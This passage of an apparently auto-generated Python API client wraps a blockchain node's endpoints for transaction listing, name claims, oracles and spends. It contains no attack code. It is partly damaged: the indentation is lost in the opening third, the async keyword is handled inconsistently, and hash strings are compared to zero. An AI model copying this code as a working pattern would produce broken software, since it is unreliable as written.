if 'tx_encoding' in params:
query_params.append(('tx_encoding', params['tx_encoding'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/block/tx/latest/{tx_index}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SingleTxObject', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_txs_list_from_block_range_by_hash(self, _from, to, **kwargs):  # noqa: E501
    """Get transactions list from a block range by hash.

    Synchronous by default; pass ``async=True`` to receive the request
    thread instead (call ``thread.get()`` on it for the result).

    :param async bool: execute the request asynchronously
    :param str _from: Hash of the block to start the range (required)
    :param str to: Hash of the block to end the range (required)
    :param str tx_encoding: Transactions encoding
    :param str tx_types: Transactions types to show. Comma separated
    :param str exclude_tx_types: Transactions types not to show. Comma separated. If a tx type appears in both tx_types and exclude_tx_types, it is excluded.
    :return: TxObjects
             If the method is called asynchronously, returns the
             request thread.
    """
    # This convenience wrapper always unwraps the (data, status,
    # headers) triple down to just the deserialized payload.
    kwargs['_return_http_data_only'] = True
    if kwargs.get('async'):
        # Async path: hand the request thread back untouched.
        return self.get_txs_list_from_block_range_by_hash_with_http_info(_from, to, **kwargs)  # noqa: E501
    response = self.get_txs_list_from_block_range_by_hash_with_http_info(_from, to, **kwargs)  # noqa: E501
    return response
def get_txs_list_from_block_range_by_hash_with_http_info(self, _from, to, **kwargs): # noqa: E501
"""get_txs_list_from_block_range_by_hash # noqa: E501
Get transactions list from a block range by hash # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_txs_list_from_block_range_by_hash_with_http_info(_from, to, async=True)
>>> result = thread.get()
:param async bool
:param str _from: Hash of the block to start the range (required)
:param str to: Hash of the block to end the range (required)
:param str tx_encoding: Transactions encoding
:param str tx_types: Transactions types to show. Comma separated
:param str exclude_tx_types: Transactions types not to show. Comma separated. If a tx type appears in both tx_types and exclude_tx_types, it is excluded.
:return: TxObjects
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['_from', 'to', 'tx_encoding', 'tx_types', 'exclude_tx_types'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_txs_list_from_block_range_by_hash" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter '_from' is set
if ('_from' not in params or
params['_from'] is None):
raise ValueError("Missing the required parameter `_from` when calling `get_txs_list_from_block_range_by_hash`") # noqa: E501
# verify the required parameter 'to' is set
if ('to' not in params or
params['to'] is None):
raise ValueError("Missing the required parameter `to` when calling `get_txs_list_from_block_range_by_hash`") # noqa: E501
if '_from' in params and params['_from'] < 0: # noqa: E501
raise ValueError("Invalid value for parameter `_from` when calling `get_txs_list_from_block_range_by_hash`, must be a value greater than or equal to `0`") # noqa: E501
if 'to' in params and params['to'] < 0: # noqa: E501
raise ValueError("Invalid value for parameter `to` when calling `get_txs_list_from_block_range_by_hash`, must be a value greater than or equal to `0`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if '_from' in params:
query_params.append(('from', params['_from'])) # noqa: E501
if 'to' in params:
query_params.append(('to', params['to'])) # noqa: E501
if 'tx_encoding' in params:
query_params.append(('tx_encoding', params['tx_encoding'])) # noqa: E501
if 'tx_types' in params:
query_params.append(('tx_types', params['tx_types'])) # noqa: E501
if 'exclude_tx_types' in params:
query_params.append(('exclude_tx_types', params['exclude_tx_types'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/block/txs/list/hash', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='TxObjects', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_txs_list_from_block_range_by_height(self, _from, to, **kwargs):  # noqa: E501
    """get_txs_list_from_block_range_by_height  # noqa: E501

    Get transactions list from a block range by height.
    Synchronous by default; when called with async=True in kwargs the
    request thread is returned instead (``thread.get()`` yields the result).

    :param async bool
    :param int _from: Height of the block to start the range (required)
    :param int to: Height of the block to end the range (required)
    :param str tx_encoding: Transactions encoding
    :param str tx_types: Transactions types to show. Comma separated
    :param str exclude_tx_types: Transactions types not to show. Comma separated. If a tx type appears in both tx_types and exclude_tx_types, it is excluded.
    :return: TxObjects
             If the method is called asynchronously,
             returns the request thread.
    """
    kwargs['_return_http_data_only'] = True
    # Delegate to the *_with_http_info variant; with _return_http_data_only
    # set, the sync and async paths both hand back the same object, so a
    # single return covers both cases.
    return self.get_txs_list_from_block_range_by_height_with_http_info(_from, to, **kwargs)  # noqa: E501
def get_txs_list_from_block_range_by_height_with_http_info(self, _from, to, **kwargs):  # noqa: E501
    """get_txs_list_from_block_range_by_height  # noqa: E501

    Get transactions list from a block range by height.
    Synchronous by default; pass async=True (via kwargs) to receive the
    request thread instead.

    :param async bool
    :param int _from: Height of the block to start the range (required)
    :param int to: Height of the block to end the range (required)
    :param str tx_encoding: Transactions encoding
    :param str tx_types: Transactions types to show. Comma separated
    :param str exclude_tx_types: Transactions types not to show. Comma separated. If a tx type appears in both tx_types and exclude_tx_types, it is excluded.
    :return: TxObjects
             If the method is called asynchronously,
             returns the request thread.
    :raises TypeError: if an unexpected keyword argument is supplied
    :raises ValueError: if `_from`/`to` are missing or negative
    """
    all_params = ['_from', 'to', 'tx_encoding', 'tx_types', 'exclude_tx_types']  # noqa: E501
    all_params.append('async')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    params = locals()
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_txs_list_from_block_range_by_height" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter '_from' is set
    if ('_from' not in params or
            params['_from'] is None):
        raise ValueError("Missing the required parameter `_from` when calling `get_txs_list_from_block_range_by_height`")  # noqa: E501
    # verify the required parameter 'to' is set
    if ('to' not in params or
            params['to'] is None):
        raise ValueError("Missing the required parameter `to` when calling `get_txs_list_from_block_range_by_height`")  # noqa: E501

    if '_from' in params and params['_from'] < 0:  # noqa: E501
        raise ValueError("Invalid value for parameter `_from` when calling `get_txs_list_from_block_range_by_height`, must be a value greater than or equal to `0`")  # noqa: E501
    if 'to' in params and params['to'] < 0:  # noqa: E501
        raise ValueError("Invalid value for parameter `to` when calling `get_txs_list_from_block_range_by_height`, must be a value greater than or equal to `0`")  # noqa: E501
    collection_formats = {}

    path_params = {}

    query_params = []
    if '_from' in params:
        query_params.append(('from', params['_from']))  # noqa: E501
    if 'to' in params:
        query_params.append(('to', params['to']))  # noqa: E501
    if 'tx_encoding' in params:
        query_params.append(('tx_encoding', params['tx_encoding']))  # noqa: E501
    if 'tx_types' in params:
        query_params.append(('tx_types', params['tx_types']))  # noqa: E501
    if 'exclude_tx_types' in params:
        query_params.append(('exclude_tx_types', params['exclude_tx_types']))  # noqa: E501

    header_params = {}

    form_params = []
    local_var_files = {}

    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = []  # noqa: E501

    return self.api_client.call_api(
        '/block/txs/list/height', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='TxObjects',  # noqa: E501
        auth_settings=auth_settings,
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats,
        # `async` became a reserved keyword in Python 3.7, so it cannot be
        # written as a literal keyword argument; forward it via dict
        # unpacking instead — the runtime call is unchanged.
        **{'async': params.get('async')})
def post_name_claim_tx(self, body, **kwargs):  # noqa: E501
    """post_name_claim_tx  # noqa: E501

    Create name claim transaction.
    Synchronous by default; when called with async=True in kwargs the
    request thread is returned instead (``thread.get()`` yields the result).

    :param async bool
    :param NameClaimTx body: Creates new name claim transaction (required)
    :return: NameHash
             If the method is called asynchronously,
             returns the request thread.
    """
    kwargs['_return_http_data_only'] = True
    # Delegate to the *_with_http_info variant; with _return_http_data_only
    # set, the sync and async paths both hand back the same object.
    return self.post_name_claim_tx_with_http_info(body, **kwargs)  # noqa: E501
def post_name_claim_tx_with_http_info(self, body, **kwargs):  # noqa: E501
    """post_name_claim_tx  # noqa: E501

    Create name claim transaction.
    Synchronous by default; pass async=True (via kwargs) to receive the
    request thread instead.

    :param async bool
    :param NameClaimTx body: Creates new name claim transaction (required)
    :return: NameHash
             If the method is called asynchronously,
             returns the request thread.
    :raises TypeError: if an unexpected keyword argument is supplied
    :raises ValueError: if `body` is missing
    """
    all_params = ['body']  # noqa: E501
    all_params.append('async')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    params = locals()
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method post_name_claim_tx" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'body' is set
    if ('body' not in params or
            params['body'] is None):
        raise ValueError("Missing the required parameter `body` when calling `post_name_claim_tx`")  # noqa: E501

    collection_formats = {}

    path_params = {}

    query_params = []

    header_params = {}

    form_params = []
    local_var_files = {}

    body_params = None
    if 'body' in params:
        body_params = params['body']
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = []  # noqa: E501

    return self.api_client.call_api(
        '/name-claim-tx', 'POST',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='NameHash',  # noqa: E501
        auth_settings=auth_settings,
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats,
        # `async` became a reserved keyword in Python 3.7, so it cannot be
        # written as a literal keyword argument; forward it via dict
        # unpacking instead — the runtime call is unchanged.
        **{'async': params.get('async')})
def post_name_preclaim_tx(self, body, **kwargs):  # noqa: E501
    """post_name_preclaim_tx  # noqa: E501

    Create name preclaim transaction.
    Synchronous by default; when called with async=True in kwargs the
    request thread is returned instead (``thread.get()`` yields the result).

    :param async bool
    :param NamePreclaimTx body: Creates new name preclaim transaction (required)
    :return: NameCommitmentHash
             If the method is called asynchronously,
             returns the request thread.
    """
    kwargs['_return_http_data_only'] = True
    # Delegate to the *_with_http_info variant; with _return_http_data_only
    # set, the sync and async paths both hand back the same object.
    return self.post_name_preclaim_tx_with_http_info(body, **kwargs)  # noqa: E501
def post_name_preclaim_tx_with_http_info(self, body, **kwargs):  # noqa: E501
    """post_name_preclaim_tx  # noqa: E501

    Create name preclaim transaction.
    Synchronous by default; pass async=True (via kwargs) to receive the
    request thread instead.

    :param async bool
    :param NamePreclaimTx body: Creates new name preclaim transaction (required)
    :return: NameCommitmentHash
             If the method is called asynchronously,
             returns the request thread.
    :raises TypeError: if an unexpected keyword argument is supplied
    :raises ValueError: if `body` is missing
    """
    all_params = ['body']  # noqa: E501
    all_params.append('async')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    params = locals()
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method post_name_preclaim_tx" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'body' is set
    if ('body' not in params or
            params['body'] is None):
        raise ValueError("Missing the required parameter `body` when calling `post_name_preclaim_tx`")  # noqa: E501

    collection_formats = {}

    path_params = {}

    query_params = []

    header_params = {}

    form_params = []
    local_var_files = {}

    body_params = None
    if 'body' in params:
        body_params = params['body']
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = []  # noqa: E501

    return self.api_client.call_api(
        '/name-preclaim-tx', 'POST',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='NameCommitmentHash',  # noqa: E501
        auth_settings=auth_settings,
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats,
        # `async` became a reserved keyword in Python 3.7, so it cannot be
        # written as a literal keyword argument; forward it via dict
        # unpacking instead — the runtime call is unchanged.
        **{'async': params.get('async')})
def post_name_revoke_tx(self, body, **kwargs):  # noqa: E501
    """post_name_revoke_tx  # noqa: E501

    Create name revoke transaction.
    Synchronous by default; when called with async=True in kwargs the
    request thread is returned instead (``thread.get()`` yields the result).

    :param async bool
    :param NameRevokeTx body: Creates new name revoke transaction (required)
    :return: NameHash
             If the method is called asynchronously,
             returns the request thread.
    """
    kwargs['_return_http_data_only'] = True
    # Delegate to the *_with_http_info variant; with _return_http_data_only
    # set, the sync and async paths both hand back the same object.
    return self.post_name_revoke_tx_with_http_info(body, **kwargs)  # noqa: E501
def post_name_revoke_tx_with_http_info(self, body, **kwargs):  # noqa: E501
    """post_name_revoke_tx  # noqa: E501

    Create name revoke transaction.
    Synchronous by default; pass async=True (via kwargs) to receive the
    request thread instead.

    :param async bool
    :param NameRevokeTx body: Creates new name revoke transaction (required)
    :return: NameHash
             If the method is called asynchronously,
             returns the request thread.
    :raises TypeError: if an unexpected keyword argument is supplied
    :raises ValueError: if `body` is missing
    """
    all_params = ['body']  # noqa: E501
    all_params.append('async')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    params = locals()
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method post_name_revoke_tx" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'body' is set
    if ('body' not in params or
            params['body'] is None):
        raise ValueError("Missing the required parameter `body` when calling `post_name_revoke_tx`")  # noqa: E501

    collection_formats = {}

    path_params = {}

    query_params = []

    header_params = {}

    form_params = []
    local_var_files = {}

    body_params = None
    if 'body' in params:
        body_params = params['body']
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = []  # noqa: E501

    return self.api_client.call_api(
        '/name-revoke-tx', 'POST',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='NameHash',  # noqa: E501
        auth_settings=auth_settings,
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats,
        # `async` became a reserved keyword in Python 3.7, so it cannot be
        # written as a literal keyword argument; forward it via dict
        # unpacking instead — the runtime call is unchanged.
        **{'async': params.get('async')})
def post_name_transfer_tx(self, body, **kwargs):  # noqa: E501
    """post_name_transfer_tx  # noqa: E501

    Create name transfer transaction.
    Synchronous by default; when called with async=True in kwargs the
    request thread is returned instead (``thread.get()`` yields the result).

    :param async bool
    :param NameTransferTx body: Creates new name transfer transaction (required)
    :return: NameHash
             If the method is called asynchronously,
             returns the request thread.
    """
    kwargs['_return_http_data_only'] = True
    # Delegate to the *_with_http_info variant; with _return_http_data_only
    # set, the sync and async paths both hand back the same object.
    return self.post_name_transfer_tx_with_http_info(body, **kwargs)  # noqa: E501
def post_name_transfer_tx_with_http_info(self, body, **kwargs):  # noqa: E501
    """post_name_transfer_tx  # noqa: E501

    Create name transfer transaction.
    Synchronous by default; pass async=True (via kwargs) to receive the
    request thread instead.

    :param async bool
    :param NameTransferTx body: Creates new name transfer transaction (required)
    :return: NameHash
             If the method is called asynchronously,
             returns the request thread.
    :raises TypeError: if an unexpected keyword argument is supplied
    :raises ValueError: if `body` is missing
    """
    all_params = ['body']  # noqa: E501
    all_params.append('async')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    params = locals()
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method post_name_transfer_tx" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'body' is set
    if ('body' not in params or
            params['body'] is None):
        raise ValueError("Missing the required parameter `body` when calling `post_name_transfer_tx`")  # noqa: E501

    collection_formats = {}

    path_params = {}

    query_params = []

    header_params = {}

    form_params = []
    local_var_files = {}

    body_params = None
    if 'body' in params:
        body_params = params['body']
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = []  # noqa: E501

    return self.api_client.call_api(
        '/name-transfer-tx', 'POST',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='NameHash',  # noqa: E501
        auth_settings=auth_settings,
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats,
        # `async` became a reserved keyword in Python 3.7, so it cannot be
        # written as a literal keyword argument; forward it via dict
        # unpacking instead — the runtime call is unchanged.
        **{'async': params.get('async')})
def post_name_update_tx(self, body, **kwargs):  # noqa: E501
    """post_name_update_tx  # noqa: E501

    Create name update transaction.
    Synchronous by default; when called with async=True in kwargs the
    request thread is returned instead (``thread.get()`` yields the result).

    :param async bool
    :param NameUpdateTx body: Creates new name update transaction (required)
    :return: NameHash
             If the method is called asynchronously,
             returns the request thread.
    """
    kwargs['_return_http_data_only'] = True
    # Delegate to the *_with_http_info variant; with _return_http_data_only
    # set, the sync and async paths both hand back the same object.
    return self.post_name_update_tx_with_http_info(body, **kwargs)  # noqa: E501
def post_name_update_tx_with_http_info(self, body, **kwargs):  # noqa: E501
    """post_name_update_tx  # noqa: E501

    Create name update transaction.
    Synchronous by default; pass async=True (via kwargs) to receive the
    request thread instead.

    :param async bool
    :param NameUpdateTx body: Creates new name update transaction (required)
    :return: NameHash
             If the method is called asynchronously,
             returns the request thread.
    :raises TypeError: if an unexpected keyword argument is supplied
    :raises ValueError: if `body` is missing
    """
    all_params = ['body']  # noqa: E501
    all_params.append('async')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    params = locals()
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method post_name_update_tx" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'body' is set
    if ('body' not in params or
            params['body'] is None):
        raise ValueError("Missing the required parameter `body` when calling `post_name_update_tx`")  # noqa: E501

    collection_formats = {}

    path_params = {}

    query_params = []

    header_params = {}

    form_params = []
    local_var_files = {}

    body_params = None
    if 'body' in params:
        body_params = params['body']
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = []  # noqa: E501

    return self.api_client.call_api(
        '/name-update-tx', 'POST',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='NameHash',  # noqa: E501
        auth_settings=auth_settings,
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats,
        # `async` became a reserved keyword in Python 3.7, so it cannot be
        # written as a literal keyword argument; forward it via dict
        # unpacking instead — the runtime call is unchanged.
        **{'async': params.get('async')})
def post_oracle_query_tx(self, body, **kwargs):  # noqa: E501
    """post_oracle_query_tx  # noqa: E501

    Create oracle query transaction.
    Synchronous by default; when called with async=True in kwargs the
    request thread is returned instead (``thread.get()`` yields the result).

    :param async bool
    :param OracleQueryTx body: Creates new oracle query transaction (required)
    :return: OracleQueryResponse
             If the method is called asynchronously,
             returns the request thread.
    """
    kwargs['_return_http_data_only'] = True
    # Delegate to the *_with_http_info variant; with _return_http_data_only
    # set, the sync and async paths both hand back the same object.
    return self.post_oracle_query_tx_with_http_info(body, **kwargs)  # noqa: E501
def post_oracle_query_tx_with_http_info(self, body, **kwargs):  # noqa: E501
    """post_oracle_query_tx  # noqa: E501

    Create oracle query transaction.
    Synchronous by default; pass async=True (via kwargs) to receive the
    request thread instead.

    :param async bool
    :param OracleQueryTx body: Creates new oracle query transaction (required)
    :return: OracleQueryResponse
             If the method is called asynchronously,
             returns the request thread.
    :raises TypeError: if an unexpected keyword argument is supplied
    :raises ValueError: if `body` is missing
    """
    all_params = ['body']  # noqa: E501
    all_params.append('async')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    params = locals()
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method post_oracle_query_tx" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'body' is set
    if ('body' not in params or
            params['body'] is None):
        raise ValueError("Missing the required parameter `body` when calling `post_oracle_query_tx`")  # noqa: E501

    collection_formats = {}

    path_params = {}

    query_params = []

    header_params = {}

    form_params = []
    local_var_files = {}

    body_params = None
    if 'body' in params:
        body_params = params['body']
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = []  # noqa: E501

    return self.api_client.call_api(
        '/oracle-query-tx', 'POST',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='OracleQueryResponse',  # noqa: E501
        auth_settings=auth_settings,
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats,
        # `async` became a reserved keyword in Python 3.7, so it cannot be
        # written as a literal keyword argument; forward it via dict
        # unpacking instead — the runtime call is unchanged.
        **{'async': params.get('async')})
def post_oracle_register_tx(self, body, **kwargs):  # noqa: E501
    """post_oracle_register_tx  # noqa: E501

    Create oracle register transaction.
    Synchronous by default; when called with async=True in kwargs the
    request thread is returned instead (``thread.get()`` yields the result).

    :param async bool
    :param OracleRegisterTx body: Creates new oracle register transaction (required)
    :return: OracleRegisterResponse
             If the method is called asynchronously,
             returns the request thread.
    """
    kwargs['_return_http_data_only'] = True
    # Delegate to the *_with_http_info variant; with _return_http_data_only
    # set, the sync and async paths both hand back the same object.
    return self.post_oracle_register_tx_with_http_info(body, **kwargs)  # noqa: E501
def post_oracle_register_tx_with_http_info(self, body, **kwargs):  # noqa: E501
    """post_oracle_register_tx  # noqa: E501

    Create oracle register transaction.
    Synchronous by default; pass async=True (via kwargs) to receive the
    request thread instead.

    :param async bool
    :param OracleRegisterTx body: Creates new oracle register transaction (required)
    :return: OracleRegisterResponse
             If the method is called asynchronously,
             returns the request thread.
    :raises TypeError: if an unexpected keyword argument is supplied
    :raises ValueError: if `body` is missing
    """
    all_params = ['body']  # noqa: E501
    all_params.append('async')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    params = locals()
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method post_oracle_register_tx" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'body' is set
    if ('body' not in params or
            params['body'] is None):
        raise ValueError("Missing the required parameter `body` when calling `post_oracle_register_tx`")  # noqa: E501

    collection_formats = {}

    path_params = {}

    query_params = []

    header_params = {}

    form_params = []
    local_var_files = {}

    body_params = None
    if 'body' in params:
        body_params = params['body']
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = []  # noqa: E501

    return self.api_client.call_api(
        '/oracle-register-tx', 'POST',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='OracleRegisterResponse',  # noqa: E501
        auth_settings=auth_settings,
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats,
        # `async` became a reserved keyword in Python 3.7, so it cannot be
        # written as a literal keyword argument; forward it via dict
        # unpacking instead — the runtime call is unchanged.
        **{'async': params.get('async')})
def post_oracle_response_tx(self, body, **kwargs):  # noqa: E501
    """post_oracle_response_tx  # noqa: E501

    Create oracle response transaction.
    Synchronous by default; when called with async=True in kwargs the
    request thread is returned instead (``thread.get()`` yields the result).

    :param async bool
    :param OracleResponseTx body: Creates new oracle response transaction (required)
    :return: OracleQueryResponse
             If the method is called asynchronously,
             returns the request thread.
    """
    kwargs['_return_http_data_only'] = True
    # Delegate to the *_with_http_info variant; with _return_http_data_only
    # set, the sync and async paths both hand back the same object.
    return self.post_oracle_response_tx_with_http_info(body, **kwargs)  # noqa: E501
def post_oracle_response_tx_with_http_info(self, body, **kwargs):  # noqa: E501
    """post_oracle_response_tx  # noqa: E501

    Create oracle response transaction.
    Synchronous by default; pass async=True (via kwargs) to receive the
    request thread instead.

    :param async bool
    :param OracleResponseTx body: Creates new oracle response transaction (required)
    :return: OracleQueryResponse
             If the method is called asynchronously,
             returns the request thread.
    :raises TypeError: if an unexpected keyword argument is supplied
    :raises ValueError: if `body` is missing
    """
    all_params = ['body']  # noqa: E501
    all_params.append('async')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    params = locals()
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method post_oracle_response_tx" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'body' is set
    if ('body' not in params or
            params['body'] is None):
        raise ValueError("Missing the required parameter `body` when calling `post_oracle_response_tx`")  # noqa: E501

    collection_formats = {}

    path_params = {}

    query_params = []

    header_params = {}

    form_params = []
    local_var_files = {}

    body_params = None
    if 'body' in params:
        body_params = params['body']
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = []  # noqa: E501

    return self.api_client.call_api(
        '/oracle-response-tx', 'POST',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='OracleQueryResponse',  # noqa: E501
        auth_settings=auth_settings,
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats,
        # `async` became a reserved keyword in Python 3.7, so it cannot be
        # written as a literal keyword argument; forward it via dict
        # unpacking instead — the runtime call is unchanged.
        **{'async': params.get('async')})
def post_spend_tx(self, body, **kwargs):  # noqa: E501
    """post_spend_tx  # noqa: E501

    Create spend transaction.
    Synchronous by default; when called with async=True in kwargs the
    request thread is returned instead (``thread.get()`` yields the result).

    :param async bool
    :param SpendTx body: Creates new spend transaction (required)
    :return: None
             If the method is called asynchronously,
             returns the request thread.
    """
    kwargs['_return_http_data_only'] = True
    # Delegate to the *_with_http_info variant; with _return_http_data_only
    # set, the sync and async paths both hand back the same object.
    return self.post_spend_tx_with_http_info(body, **kwargs)  # noqa: E501
def post_spend_tx_with_http_info(self, body, **kwargs):  # noqa: E501
    """post_spend_tx  # noqa: E501

    Create spend transaction.
    Synchronous by default; pass async=True (via kwargs) to receive the
    request thread instead.

    :param async bool
    :param SpendTx body: Creates new spend transaction (required)
    :return: None
             If the method is called asynchronously,
             returns the request thread.
    :raises TypeError: if an unexpected keyword argument is supplied
    :raises ValueError: if `body` is missing
    """
    all_params = ['body']  # noqa: E501
    all_params.append('async')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    params = locals()
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
